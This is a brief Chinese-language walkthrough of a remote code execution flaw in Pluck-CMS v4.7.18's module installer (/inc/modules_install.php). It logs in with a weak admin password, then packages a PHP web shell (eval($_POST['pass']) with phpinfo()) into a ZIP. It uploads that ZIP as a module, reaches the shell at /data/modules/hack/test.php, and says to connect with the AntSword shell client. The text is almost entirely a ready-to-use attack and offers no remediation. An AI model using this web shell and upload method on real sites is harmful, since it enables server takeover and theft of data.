漏洞简介

Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件，攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。

漏洞复现

进入管理员登录页面：

弱口令admin123进入系统。

构造恶意zip包：

1、创建一个test.php文件，写入恶意代码。

test.php

<?php 
	eval($_POST['pass']);
	phpinfo();
?>

2、将test.php放入名称为hack的文件夹中，再将hack文件夹压缩为zip包。

上传恶意zip包：

上传成功后访问/data/modules/hack/test.php：

phpinfo()成功执行，后续蚁剑连接即可。